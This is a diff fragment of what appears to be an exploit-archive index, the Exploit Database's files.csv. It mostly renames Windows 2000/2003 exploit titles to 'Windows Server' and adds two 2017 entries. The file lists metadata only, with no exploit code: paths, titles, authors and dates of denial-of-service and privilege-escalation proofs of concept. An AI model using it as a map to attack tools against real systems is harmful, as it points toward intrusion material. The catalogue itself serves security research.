 16121,platforms/windows/dos/16121.py,"Hanso Converter 1.1.0 - BufferOverflow Denial of Service",2011-02-06,badc0re,windows,dos,0
 16129,platforms/linux/dos/16129.txt,"ProFTPd mod_sftp - Integer Overflow Denial of Service (PoC)",2011-02-07,kingcope,linux,dos,0
-16166,platforms/windows/dos/16166.py,"Microsoft Windows 2003 - AD Unauthenticated BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0
+16166,platforms/windows/dos/16166.py,"Microsoft Windows Server 2003 - AD Unauthenticated BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0
 16150,platforms/windows/dos/16150.py,"XM Easy Personal FTP Server 5.8.0 - 'TYPE' Denial of Service",2011-02-10,"Houssam Sahli",windows,dos,0
 16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - '.csv' Denial of Service",2011-02-17,b0telh0,windows,dos,0
 16182,platforms/linux/dos/16182.txt,"PHP 5.3.5 - grapheme_extract() Null Pointer Dereference",2011-02-17,"Maksymilian Arciemowicz",linux,dos,0
@@ -2348,14 +2348,14 @@ id,file,description,date,author,platform,type,port
 19780,platforms/multiple/dos/19780.txt,"Trend Micro OfficeScan Corporate Edition 3.0/3.5/3.11/3.13 - Denial of Service",2000-02-26,"Jeff Stevens",multiple,dos,0
 19782,platforms/windows/dos/19782.pl,"HP OpenView OmniBack II 2.55/3.0/3.1 - Denial of Service",2000-02-28,"Jon Hittner",windows,dos,0
 19783,platforms/windows/dos/19783.txt,"Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 - GET Request",1999-08-25,"ISS X-Force",windows,dos,0
-19799,platforms/windows/dos/19799.txt,"Microsoft Windows 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 Microsoft DoS Device Name - Denial of Service",2000-03-04,anonymous,windows,dos,0
+19799,platforms/windows/dos/19799.txt,"Microsoft Windows Server 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 Microsoft DoS Device Name - Denial of Service",2000-03-04,anonymous,windows,dos,0
 19806,platforms/windows/dos/19806.c,"Atrium Software Mercur Mail Server 3.2 - Multiple Buffer Overflows (1)",2000-03-14,"Ussr Labs",windows,dos,0
 19807,platforms/windows/dos/19807.txt,"Atrium Software Mercur Mail Server 3.2 - Multiple Buffer Overflows (2)",2000-03-14,"Ussr Labs",windows,dos,0
 19810,platforms/windows/dos/19810.txt,"Atrium Software Mercur WebView WebMail-Client 1.0 - Buffer Overflow",2000-03-16,"Ussr Labs",windows,dos,0
 19817,platforms/ultrix/dos/19817.txt,"Data General DG/UX 5.4 - inetd Service Exhaustion Denial of Service",2000-03-16,"The Unicorn",ultrix,dos,0
 19818,platforms/linux/dos/19818.c,"Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service",2000-03-23,"Jay Fenlason",linux,dos,0
 19820,platforms/windows/dos/19820.txt,"AnalogX SimpleServer:WWW 1.0.3 - Denial of Service",2000-03-25,"Presto Chango",windows,dos,0
-19827,platforms/windows/dos/19827.txt,"NT 4.0 / Windows 2000 - TCP/IP Printing Service Denial of Service",2000-03-30,"Ussr Labs",windows,dos,0
+19827,platforms/windows/dos/19827.txt,"Microsoft Windows Server 2000/NT 4.0 - TCP/IP Printing Service Denial of Service",2000-03-30,"Ussr Labs",windows,dos,0
 19963,platforms/windows/dos/19963.txt,"PHP 6.0 - openssl_verify() Local Buffer Overflow (PoC)",2012-07-20,"Yakir Wizman",windows,dos,0
 19834,platforms/windows/dos/19834.txt,"Real Networks RealPlayer 6/7 - Location Buffer Overflow",2000-04-03,"Adam Muntner",windows,dos,0
 19835,platforms/windows/dos/19835.txt,"SalesLogix Corporation eViewer 1.0 - Denial of Service",2000-03-31,"Todd Beebe",windows,dos,0
@@ -2403,7 +2403,7 @@ id,file,description,date,author,platform,type,port
 20025,platforms/linux/dos/20025.txt,"Debian 2.1/2.2 / Mandrake 6.0/6.1/7.0 / RedHat 6.x - rpc.lockd Remote Denial of Service",2000-06-08,"Mike Murray",linux,dos,0
 20026,platforms/linux/dos/20026.c,"OpenLinux 2.3/2.4 / RedHat 6.0/6.1 / SCO eServer 2.3 - Denial of Service",1999-11-23,FuckGpm,linux,dos,0
 20039,platforms/windows/dos/20039.java,"LeafDigital LeafChat 1.7 - Denial of Service",2000-06-25,"MDMA Crew",windows,dos,0
-20047,platforms/windows/dos/20047.txt,"Microsoft Windows 2000 - Telnet Server Denial of Service",2000-06-30,"SecureXpert Labs",windows,dos,0
+20047,platforms/windows/dos/20047.txt,"Microsoft Windows Server 2000 - Telnet Server Denial of Service",2000-06-30,"SecureXpert Labs",windows,dos,0
 20050,platforms/hardware/dos/20050.c,"Check Point Software Firewall-1 3.0/1.4.0/1.4.1 - Spoofed Source Denial of Service",2000-07-05,lore,hardware,dos,0
 20051,platforms/windows/dos/20051.c,"Sybergen SyGate 2.0/3.11 - Denial of Service",2000-06-30,"Marc of eEye",windows,dos,0
 20052,platforms/multiple/dos/20052.txt,"Centrinity FirstClass 5.77 - Intranet Server Long Header Denial of Service",2000-06-27,"Adam Prime",multiple,dos,0
@@ -2539,7 +2539,7 @@ id,file,description,date,author,platform,type,port
 20870,platforms/windows/dos/20870.pl,"Express Burn Plus 4.58 - EBP Project File Handling Buffer Overflow (PoC)",2012-08-28,LiquidWorm,windows,dos,0
 20883,platforms/windows/dos/20883.txt,"Faust Informatics FreeStyle Chat 4.1 SR2 MS-DOS Device Name - Denial of Service",2001-05-25,nemesystm,windows,dos,0
 20904,platforms/windows/dos/20904.pl,"Pragma Systems InterAccess TelnetD Server 4.0 - Denial of Service",2001-06-06,nemesystm,windows,dos,0
-20907,platforms/windows/dos/20907.sh,"Microsoft Windows 2000 - Telnet 'Username' Denial of Service",2001-06-07,"Michal Zalewski",windows,dos,0
+20907,platforms/windows/dos/20907.sh,"Microsoft Windows Server 2000 - Telnet 'Username' Denial of Service",2001-06-07,"Michal Zalewski",windows,dos,0
 20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system - SEH 0verwrite",2012-08-29,Ciph3r,windows,dos,0
 20955,platforms/windows/dos/20955.pl,"Internet Download Manager - Memory Corruption",2012-08-31,Dark-Puzzle,windows,dos,0
 20922,platforms/osx/dos/20922.txt,"Rumpus FTP Server 1.3.x/2.0.3 - Stack Overflow Denial of Service",2001-06-12,"Jass Seljamaa",osx,dos,0
@@ -2567,12 +2567,12 @@ id,file,description,date,author,platform,type,port
 21077,platforms/bsd/dos/21077.c,"BSDI 3.0/3.1 - Possible Local Kernel Denial of Service",2001-08-21,V9,bsd,dos,0
 21092,platforms/hardware/dos/21092.txt,"Cisco CBOS 2.x - Multiple TCP Connection Denial of Service",2001-08-23,"Cisco Security",hardware,dos,0
 40419,platforms/linux/dos/40419.c,"Linux - SELinux W+X Protection Bypass via AIO",2016-09-23,"Google Security Research",linux,dos,0
-21099,platforms/windows/dos/21099.c,"Microsoft Windows 2000 - RunAs Service Denial of Service",2001-12-11,Camisade,windows,dos,0
+21099,platforms/windows/dos/21099.c,"Microsoft Windows Server 2000 - RunAs Service Denial of Service",2001-12-11,Camisade,windows,dos,0
 21103,platforms/hardware/dos/21103.c,"D-Link Dl-704 2.56 b5 - IP Fragment Denial of Service",2000-05-23,phonix,hardware,dos,0
 21122,platforms/linux/dos/21122.sh,"Linux Kernel 2.2 / 2.4 - Deep Symbolic Link Denial of Service",2001-10-18,Nergal,linux,dos,0
-21123,platforms/windows/dos/21123.txt,"Microsoft Windows 2000/NT - Terminal Server Service RDP Denial of Service",2001-10-18,"Luciano Martins",windows,dos,0
+21123,platforms/windows/dos/21123.txt,"Microsoft Windows Server 2000/NT - Terminal Server Service RDP Denial of Service",2001-10-18,"Luciano Martins",windows,dos,0
 21126,platforms/multiple/dos/21126.c,"6Tunnel 0.6/0.7/0.8 - Connection Close State Denial of Service",2001-10-23,awayzzz,multiple,dos,0
-21131,platforms/windows/dos/21131.txt,"Microsoft Windows 2000/XP - GDI Denial of Service",2001-10-29,PeterB,windows,dos,0
+21131,platforms/windows/dos/21131.txt,"Microsoft Windows Server 2000/XP - GDI Denial of Service",2001-10-29,PeterB,windows,dos,0
 21147,platforms/windows/dos/21147.txt,"WAP Proof 2008 - Denial of Service",2012-09-08,"Orion Einfold",windows,dos,0
 21141,platforms/linux/dos/21141.txt,"RedHat TUX 2.1.0-2 - HTTP Server Oversized Host Denial of Service",2001-11-05,"Aiden ORawe",linux,dos,0
 21143,platforms/windows/dos/21143.pl,"Raptor Firewall 4.0/5.0/6.0.x - Zero Length UDP Packet Resource Consumption",2001-06-21,"Max Moser",windows,dos,0
@@ -2580,8 +2580,8 @@ id,file,description,date,author,platform,type,port
 21163,platforms/windows/dos/21163.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 - Multiple Denial of Service (2)",2001-11-29,"Alex Hernandez",windows,dos,0
 21167,platforms/openbsd/dos/21167.c,"OpenBSD 2.x/3.0 - User Mode Return Value Denial of Service",2001-12-03,"Marco Peereboom",openbsd,dos,0
 21170,platforms/windows/dos/21170.txt,"Volition Red Faction 1.0/1.1 - Game Server/Client Denial of Service",2001-12-07,sh0,windows,dos,0
-21171,platforms/windows/dos/21171.c,"Microsoft Windows 2000 - Internet Key Exchange Denial of Service (1)",2001-12-11,"Nelson Brito",windows,dos,0
+21171,platforms/windows/dos/21171.c,"Microsoft Windows Server 2000 - Internet Key Exchange Denial of Service (1)",2001-12-11,"Nelson Brito",windows,dos,0
-21172,platforms/windows/dos/21172.pl,"Microsoft Windows 2000 - Internet Key Exchange Denial of Service (2)",2001-12-07,"Nelson Brito",windows,dos,0
+21172,platforms/windows/dos/21172.pl,"Microsoft Windows Server 2000 - Internet Key Exchange Denial of Service (2)",2001-12-07,"Nelson Brito",windows,dos,0
 21174,platforms/windows/dos/21174.c,"Denicomp Winsock RSHD/NT Standard Error 2.20.00 - Denial of Service",2001-12-10,jimmers,windows,dos,0
 21175,platforms/windows/dos/21175.c,"Denicomp Winsock RSHD/NT Standard Error 2.21.00 - Denial of Service",2001-12-10,jimmers,windows,dos,0
 21177,platforms/windows/dos/21177.txt,"Microsoft IIS 5.0 - False Content-Length Field Denial of Service",2001-12-11,"Ivan Hernandez Puga",windows,dos,0
@@ -2596,8 +2596,8 @@ id,file,description,date,author,platform,type,port
 21236,platforms/unix/dos/21236.txt,"DNRD 1.x/2.x - DNS Request/Reply Denial of Service",2002-01-20,"Andrew Griffiths",unix,dos,0
 21237,platforms/windows/dos/21237.pl,"Cyberstop Web Server 0.1 - Long Request Denial of Service",2002-01-22,"Alex Hernandez",windows,dos,0
 21240,platforms/windows/dos/21240.txt,"Microsoft Windows XP - '.Manifest' Denial of Service",2002-01-21,mosestycoon,windows,dos,0
-21245,platforms/windows/dos/21245.c,"Microsoft Windows 2000/NT 4 - TCP Stack Denial of Service (1)",2001-04-13,3APA3A,windows,dos,0
+21245,platforms/windows/dos/21245.c,"Microsoft Windows Server 2000/NT 4 - TCP Stack Denial of Service (1)",2001-04-13,3APA3A,windows,dos,0
-21246,platforms/windows/dos/21246.c,"Microsoft Windows 2000/NT 4 - TCP Stack Denial of Service (2)",2001-04-13,3APA3A,windows,dos,0
+21246,platforms/windows/dos/21246.c,"Microsoft Windows Server 2000/NT 4 - TCP Stack Denial of Service (2)",2001-04-13,3APA3A,windows,dos,0
 21261,platforms/unix/dos/21261.txt,"Tru64 - Malformed TCP Packet Denial of Service",2002-01-31,"Luca Papotti",unix,dos,0
 21262,platforms/linux/dos/21262.txt,"kicq 2.0.0b1 - Invalid ICQ Packet Denial of Service",2002-02-02,"Rafael San Miguel Carrasco",linux,dos,0
 21275,platforms/osx/dos/21275.c,"ICQ For Mac OSX 2.6 Client - Denial of Service",2002-02-05,Stephen,osx,dos,0
@@ -2617,8 +2617,8 @@ id,file,description,date,author,platform,type,port
 21419,platforms/windows/dos/21419.txt,"Microsoft Outlook Express 5.5 - Denial of Service Device Denial of Service",2002-04-24,ERRor,windows,dos,0
 21379,platforms/multiple/dos/21379.pl,"Melange Chat System 2.0.2 Beta 2 - /yell Remote Buffer Overflow",2002-04-14,DVDMAN,multiple,dos,0
 21387,platforms/windows/dos/21387.txt,"WebTrends Reporting Center for Windows 4.0 d - GET Request Buffer Overflow",2002-04-17,"Mark Litchfield",windows,dos,0
-21388,platforms/windows/dos/21388.c,"Microsoft Windows 2000 - Lanman Denial of Service (1)",2002-04-17,"Daniel Nystrom",windows,dos,0
+21388,platforms/windows/dos/21388.c,"Microsoft Windows Server 2000 - Lanman Denial of Service (1)",2002-04-17,"Daniel Nystrom",windows,dos,0
-21389,platforms/windows/dos/21389.txt,"Microsoft Windows 2000 - Lanman Denial of Service (2)",2003-01-03,ch0wn,windows,dos,0
+21389,platforms/windows/dos/21389.txt,"Microsoft Windows Server 2000 - Lanman Denial of Service (2)",2003-01-03,ch0wn,windows,dos,0
 21404,platforms/windows/dos/21404.htm,"Microsoft Internet Explorer 5/6 - Self-Referential Object Denial of Service",2002-04-20,"Matthew Murphy",windows,dos,0
 21409,platforms/unix/dos/21409.pl,"psyBNC 2.3 - Oversized Passwords Denial of Service",2002-04-22,DVDMAN,unix,dos,0
 21413,platforms/multiple/dos/21413.txt,"National Instruments LabVIEW 5.1.1/6.0/6.1 - HTTP Request Denial of Service",2002-04-19,"Steve Zins",multiple,dos,0
@@ -2675,8 +2675,8 @@ id,file,description,date,author,platform,type,port
 21737,platforms/windows/dos/21737.txt,"Cyme ChartFX Client Server - ActiveX Control Array Indexing",2012-10-04,"Francis Provencher",windows,dos,0
 21739,platforms/windows/dos/21739.pl,"JPEGsnoop 1.5.2 - WriteAV Crash (PoC)",2012-10-04,"Jean Pascal Pereira",windows,dos,0
 21741,platforms/windows/dos/21741.txt,"XnView 1.99.1 - '.JLS' File Decompression Heap Overflow",2012-10-04,"Joseph Sheridan",windows,dos,0
-21746,platforms/windows/dos/21746.c,"Microsoft Windows 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (1)",2002-08-22,"Frederic Deletang",windows,dos,0
+21746,platforms/windows/dos/21746.c,"Microsoft Windows Server 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (1)",2002-08-22,"Frederic Deletang",windows,dos,0
-21747,platforms/windows/dos/21747.txt,"Microsoft Windows 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (2)",2002-08-22,zamolx3,windows,dos,0
+21747,platforms/windows/dos/21747.txt,"Microsoft Windows Server 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (2)",2002-08-22,zamolx3,windows,dos,0
 21756,platforms/hardware/dos/21756.txt,"Belkin F5D6130 Wireless Network Access Point - SNMP Request Denial of Service",2002-08-26,wlanman,hardware,dos,0
 21770,platforms/hardware/dos/21770.c,"Cisco VPN 3000 Series Concentrator Client - Authentication Denial of Service",2002-09-03,Phenoelit,hardware,dos,0
 21775,platforms/linux/dos/21775.c,"SWS Simple Web Server 0.0.3/0.0.4/0.1 - New Line Denial of Service",2002-09-02,saman,linux,dos,0
@@ -3328,7 +3328,7 @@ id,file,description,date,author,platform,type,port
 40820,platforms/windows/dos/40820.txt,"UCanCode - Multiple Vulnerabilities",2016-11-23,shinnai,windows,dos,0
 25218,platforms/windows/dos/25218.pl,"PlatinumFTPServer 1.0.18 - Multiple Malformed User Name Connection Denial of Service",2005-03-05,ports,windows,dos,0
 25219,platforms/windows/dos/25219.txt,"Spinworks Application Server 3.0 - Remote Denial of Service",2005-03-15,dr_insane,windows,dos,0
-25231,platforms/windows/dos/25231.txt,"Microsoft Windows 2000/2003/XP - Graphical Device Interface Library Denial of Service",2005-03-17,"Hongzhen Zhou",windows,dos,0
+25231,platforms/windows/dos/25231.txt,"Microsoft Windows Server 2000/2003/XP - Graphical Device Interface Library Denial of Service",2005-03-17,"Hongzhen Zhou",windows,dos,0
 25234,platforms/linux/dos/25234.sh,"Linux Kernel 2.4.x / 2.6.x - Multiple Unspecified ISO9660 Filesystem Handling Vulnerabilities",2005-03-17,"Michal Zalewski",linux,dos,0
 25255,platforms/windows/dos/25255.txt,"FUN labs Game Engine - Multiple Remote Denial of Service Vulnerabilities",2005-03-20,"Luigi Auriemma",windows,dos,0
 25259,platforms/windows/dos/25259.py,"Microsoft Windows XP - Local Denial of Service",2005-03-22,liquid@cyberspace.org,windows,dos,0
@@ -3345,7 +3345,7 @@ id,file,description,date,author,platform,type,port
 25353,platforms/unix/dos/25353.txt,"IBM Lotus Domino Server 6.5.1 Web Service - Remote Denial of Service",2005-04-06,anonymous,unix,dos,0
 25363,platforms/windows/dos/25363.py,"Lan Messenger - sending PM 'UNICODE' Overwrite Buffer Overflow (SEH)",2013-05-11,ariarat,windows,dos,0
 25364,platforms/windows/dos/25364.txt,"AN HTTPD - 'CMDIS.dll' Remote Buffer Overflow",2005-04-08,"Tan Chew Keong",windows,dos,0
-25383,platforms/windows/dos/25383.pl,"Microsoft Windows 2000/XP - Internet Protocol Validation Remote Code Execution (1)",2005-04-12,"Song Liu",windows,dos,0
+25383,platforms/windows/dos/25383.pl,"Microsoft Windows Server 2000/XP - Internet Protocol Validation Remote Code Execution (1)",2005-04-12,"Song Liu",windows,dos,0
 25387,platforms/multiple/dos/25387.txt,"Multiple Vendor ICMP Implementation - Spoofed Source Quench Packet Denial of Service",2005-04-12,"Fernando Gont",multiple,dos,0
 25388,platforms/multiple/dos/25388.txt,"Multiple Vendor ICMP Implementation - Malformed Path MTU Denial of Service",2005-04-12,"Fernando Gont",multiple,dos,0
 25389,platforms/multiple/dos/25389.txt,"Multiple Vendor ICMP Message Handling - Denial of Service",2005-04-12,"Fernando Gont",multiple,dos,0
@@ -3424,7 +3424,7 @@ id,file,description,date,author,platform,type,port
 26325,platforms/multiple/dos/26325.txt,"Mozilla Firefox 1.0.6/1.0.7 - IFRAME Handling Denial of Service",2005-10-05,"Tom Ferris",multiple,dos,0
 26336,platforms/multiple/dos/26336.txt,"Oracle Forms - Servlet TLS Listener Remote Denial of Service",2005-10-07,"Alexander Kornbrust",multiple,dos,0
 26340,platforms/linux/dos/26340.c,"Up-IMAPProxy 1.2.3/1.2.4 - Multiple Unspecified Remote Format String Vulnerabilities",2005-10-10,"Steve Kemp",linux,dos,0
-26341,platforms/windows/dos/26341.txt,"Microsoft Windows 2000/2003/XP - MSDTC TIP Denial of Service (MS05-051)",2005-10-11,anonymous,windows,dos,0
+26341,platforms/windows/dos/26341.txt,"Microsoft Windows Server 2000/2003/XP - MSDTC TIP Denial of Service (MS05-051)",2005-10-11,anonymous,windows,dos,0
 26342,platforms/linux/dos/26342.txt,"RARLAB WinRar 2.90/3.x - UUE/XXE Invalid Filename Error Message Format String",2005-10-11,"Tan Chew Keong",linux,dos,0
 26382,platforms/linux/dos/26382.c,"Linux Kernel 2.6.x - IPv6 Local Denial of Service",2005-10-20,"Rémi Denis-Courmont",linux,dos,0
 26413,platforms/windows/dos/26413.py,"PEiD 0.95 - Memory Corruption (PoC)",2013-06-24,"Debasish Mandal",windows,dos,0
@@ -3444,7 +3444,7 @@ id,file,description,date,author,platform,type,port
 26648,platforms/linux/dos/26648.c,"Linux Kernel 2.6.x - Time_Out_Leases PrintK Local Denial of Service",2005-11-29,"Avi Kivity",linux,dos,0
 26665,platforms/windows/dos/26665.pl,"pcAnywhere 8.0/9.0/11.x - Authentication Denial of Service",2006-01-17,"David Maciejak",windows,dos,0
 26666,platforms/linux/dos/26666.c,"CenterICQ 4.20/4.5 - Malformed Packet Handling Remote Denial of Service",2005-11-29,"Wernfried Haas",linux,dos,0
-26690,platforms/windows/dos/26690.c,"Microsoft Windows 2000/2003/XP - CreateRemoteThread Local Denial of Service",2005-12-01,"Nima Salehi",windows,dos,0
+26690,platforms/windows/dos/26690.c,"Microsoft Windows Server 2000/2003/XP - CreateRemoteThread Local Denial of Service",2005-12-01,"Nima Salehi",windows,dos,0
 26710,platforms/multiple/dos/26710.txt,"Apache CXF < 2.5.10 / 2.6.7 / 2.7.4 - Denial of Service",2013-07-09,"SEC Consult",multiple,dos,0
 26733,platforms/windows/dos/26733.py,"Jolix Media Player 1.1.0 - '.m3u' Denial of Service",2013-07-10,IndonesiaGokilTeam,windows,dos,0
 26749,platforms/linux/dos/26749.c,"Linux Kernel 2.6.x - File Lock Lease Local Denial of Service",2005-12-29,"J. Bruce Fields",linux,dos,0
@@ -3586,7 +3586,7 @@ id,file,description,date,author,platform,type,port
 28213,platforms/windows/dos/28213.txt,"Microsoft Internet Explorer 6 - RevealTrans Denial of Service",2006-07-12,hdm,windows,dos,0
 28220,platforms/linux/dos/28220.txt,"KDE Konqueror 3.5.x - ReplaceChild Denial of Service",2006-07-14,hdm,linux,dos,0
 28222,platforms/windows/dos/28222.txt,"Microsoft Works 8.0 Spreadsheet - Multiple Vulnerabilities",2006-06-14,"Benjamin Franz",windows,dos,0
-28227,platforms/windows/dos/28227.txt,"Microsoft Windows 2000/XP - Registry Access Local Denial of Service",2006-07-15,"David Matousek",windows,dos,0
+28227,platforms/windows/dos/28227.txt,"Microsoft Windows Server 2000/XP - Registry Access Local Denial of Service",2006-07-15,"David Matousek",windows,dos,0
 28228,platforms/hardware/dos/28228.txt,"Sunbelt Kerio Personal Firewall 4.3.426 - CreateRemoteThread Denial of Service",2006-07-15,"David Matousek",hardware,dos,0
 28230,platforms/hardware/dos/28230.txt,"Multiple D-Link Routers - UPNP Buffer Overflow",2006-07-17,"Barnaby Jack",hardware,dos,0
 28232,platforms/windows/dos/28232.txt,"Agnitum Outpost Firewall 3.5.631 - 'FiltNT.SYS' Local Denial of Service",2006-07-17,"Bipin Gautam",windows,dos,0
@@ -3629,7 +3629,7 @@ id,file,description,date,author,platform,type,port
 28389,platforms/windows/dos/28389.html,"Microsoft Internet Explorer 6 - 'MSOE.dll' Denial of Service",2006-08-15,nop,windows,dos,0
 28391,platforms/linux/dos/28391.html,"Mozilla Firefox 1.x - XML Handler Race Condition Memory Corruption",2006-08-15,"Michal Zalewski",linux,dos,0
 28401,platforms/windows/dos/28401.html,"Microsoft Internet Explorer 6 - Visual Studio COM Object Instantiation Denial of Service",2006-08-08,XSec,windows,dos,0
-28420,platforms/windows/dos/28420.htm,"Microsoft Windows 2000 - Multiple COM Object Instantiation Code Execution Vulnerabilities",2006-08-21,nop,windows,dos,0
+28420,platforms/windows/dos/28420.htm,"Microsoft Windows Server 2000 - Multiple COM Object Instantiation Code Execution Vulnerabilities",2006-08-21,nop,windows,dos,0
 28421,platforms/windows/dos/28421.htm,"Microsoft Internet Explorer 6 - Multiple COM Object Color Property Denial of Service Vulnerabilities",2006-08-21,XSec,windows,dos,0
 28463,platforms/windows/dos/28463.html,"SolarWinds Server and Application Monitor - ActiveX (Pepco32c) Buffer Overflow",2013-09-22,blake,windows,dos,0
 28451,platforms/windows/dos/28451.txt,"Share KM 1.0.19 - Remote Denial of Service",2013-09-22,"Yuda Prawira",windows,dos,0
@@ -3742,7 +3742,7 @@ id,file,description,date,author,platform,type,port
 29620,platforms/osx/dos/29620.txt,"Apple Mac OSX 10.4.8 - ImageIO GIF Image Integer Overflow",2007-02-20,"Tom Ferris",osx,dos,0
 29671,platforms/windows/dos/29671.txt,"Avira Secure Backup 1.0.0.1 Build 3616 - '.reg' Buffer Overflow",2013-11-18,"Julien Ahrens",windows,dos,0
 29791,platforms/windows/dos/29791.pl,"Boilsoft RM TO MP3 Converter 1.72 - '.wav' Crash PoC",2013-11-23,"Akin Tosunlar",windows,dos,0
-29659,platforms/windows/dos/29659.pl,"Microsoft Windows XP/2003 - Explorer .WMF File Handling Denial of Service",2007-02-25,sehato,windows,dos,0
+29659,platforms/windows/dos/29659.pl,"Microsoft Windows Server 2003/XP - Explorer .WMF File Handling Denial of Service",2007-02-25,sehato,windows,dos,0
 29660,platforms/windows/dos/29660.txt,"Microsoft Office 2003 - Denial of Service",2007-02-25,sehato,windows,dos,0
 29664,platforms/windows/dos/29664.txt,"Microsoft Publisher 2007 - Remote Denial of Service",2007-02-26,"Tom Ferris",windows,dos,0
 30187,platforms/multiple/dos/30187.txt,"Mbedthis AppWeb 2.2.2 - URL Protocol Format String",2007-06-12,"Nir Rachmel",multiple,dos,0
@@ -4091,7 +4091,7 @@ id,file,description,date,author,platform,type,port
 32550,platforms/windows/dos/32550.html,"Microsoft DebugDiag 1.0 - 'CrashHangExt.dll' ActiveX Control Remote Denial of Service",2008-10-30,suN8Hclf,windows,dos,0
 32551,platforms/linux/dos/32551.txt,"Dovecot 1.1.x - Invalid Message Address Parsing Denial of Service",2008-10-30,anonymous,linux,dos,0
 32572,platforms/windows/dos/32572.txt,"Anti-Trojan Elite 4.2.1 - 'Atepmon.sys' IOCTL Request Local Overflow",2008-11-07,alex,windows,dos,0
-32573,platforms/windows/dos/32573.txt,"Microsoft Windows 2003/Vista - 'UnhookWindowsHookEx' Local Denial of Service",2008-11-09,killprog.org,windows,dos,0
+32573,platforms/windows/dos/32573.txt,"Microsoft Windows Server 2003/Vista - 'UnhookWindowsHookEx' Local Denial of Service",2008-11-09,killprog.org,windows,dos,0
 32581,platforms/multiple/dos/32581.txt,"Zope 2.11.2 - PythonScript Multiple Remote Denial of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",multiple,dos,0
 32583,platforms/hardware/dos/32583.txt,"Netgear WGR614 - Administration Interface Remote Denial of Service",2008-11-13,sr.,hardware,dos,0
 32587,platforms/windows/dos/32587.txt,"VeryPDF PDFView - ActiveX Component Heap Buffer Overflow",2008-11-15,r0ut3r,windows,dos,0
@@ -5357,6 +5357,8 @@ id,file,description,date,author,platform,type,port
 41216,platforms/multiple/dos/41216.html,"Apple WebKit - Type Confusion in RenderBox with Accessibility Enabled",2017-02-01,"Google Security Research",multiple,dos,0
 41218,platforms/android/dos/41218.txt,"Google Android - RKP Information Disclosure via s2-remapping Physical Ranges",2017-02-01,"Google Security Research",android,dos,0
 41219,platforms/hardware/dos/41219.txt,"QNAP NVR/NAS - Buffer Overflow",2017-02-01,bashis,hardware,dos,0
+41222,platforms/windows/dos/41222.py,"Microsoft Windows 10 - SMBv3 Tree Connect (PoC)",2017-02-01,"laurent gaffie",windows,dos,0
+41232,platforms/android/dos/41232.txt,"Google Android - 'rkp_set_init_page_ro' RKP Memory Corruption",2017-02-02,"Google Security Research",android,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -5935,8 +5937,8 @@ id,file,description,date,author,platform,type,port
 6333,platforms/windows/local/6333.pl,"Acoustica Beatcraft 1.02 Build 19 - '.bcproj' Local Buffer Overflow",2008-08-30,Koshi,windows,local,0
 6337,platforms/linux/local/6337.sh,"Postfix 2.6-20080814 - 'symlink' Privilege Escalation",2008-08-31,RoMaNSoFt,linux,local,0
 6389,platforms/windows/local/6389.cpp,"Numark Cue 5.0 rev 2 - Local '.m3u' File Stack Buffer Overflow",2008-09-06,"fl0 fl0w",windows,local,0
-6705,platforms/windows/local/6705.txt,"Microsoft Windows 2003 - Token Kidnapping Local Exploit (PoC)",2008-10-08,"Cesar Cerrudo",windows,local,0
+6705,platforms/windows/local/6705.txt,"Microsoft Windows Server 2003 - Token Kidnapping Local Exploit (PoC)",2008-10-08,"Cesar Cerrudo",windows,local,0
-6757,platforms/windows/local/6757.txt,"Microsoft Windows 2003/XP - 'afd.sys' Privilege Escalation (K-plugin) (MS08-066)",2008-10-15,"Ruben Santamarta",windows,local,0
+6757,platforms/windows/local/6757.txt,"Microsoft Windows Server 2003/XP - 'afd.sys' Privilege Escalation (K-plugin) (MS08-066)",2008-10-15,"Ruben Santamarta",windows,local,0
 6787,platforms/windows/local/6787.pl,"BitTorrent 6.0.3 - '.torrent' Stack Buffer Overflow",2008-10-19,"Guido Landi",windows,local,0
 6798,platforms/windows/local/6798.pl,"VideoLAN VLC Media Player 0.9.4 - '.TY' File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",windows,local,0
 6825,platforms/windows/local/6825.pl,"VideoLAN VLC Media Player 0.9.4 - '.ty' Buffer Overflow (SEH)",2008-10-23,"Guido Landi",windows,local,0
@@ -6364,7 +6366,7 @@ id,file,description,date,author,platform,type,port
 11171,platforms/windows/local/11171.pl,"Audiotran 1.4.1 - Direct RET Buffer Overflow",2010-01-17,jacky,windows,local,0
 11174,platforms/windows/local/11174.c,"VideoLAN VLC Media Player 0.8.6 a/b/c/d - '.ass' Buffer Overflow (Win32 Universal)",2010-01-17,"fl0 fl0w",windows,local,0
 11191,platforms/windows/local/11191.pl,"Millenium MP3 Studio 1.x - '.m3u' Local Stack Overflow",2010-01-19,NeoCortex,windows,local,0
-11199,platforms/windows/local/11199.txt,"Microsoft Windows NT/2000/XP/2003/Vista/2008/7 - User Mode to Ring Escalation (KiTrap0D) (MS10-015)",2010-01-19,"Tavis Ormandy",windows,local,0
+11199,platforms/windows/local/11199.txt,"Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - User Mode to Ring Escalation (KiTrap0D) (MS10-015)",2010-01-19,"Tavis Ormandy",windows,local,0
 11202,platforms/windows/local/11202.pl,"RM Downloader - '.m3u' Buffer Overflow (SEH)",2010-01-19,jacky,windows,local,0
 11205,platforms/windows/local/11205.pl,"MP3 Studio 1.x - '.m3u' Local Stack Overflow (Universal)",2010-01-20,"D3V!L FUCKER",windows,local,0
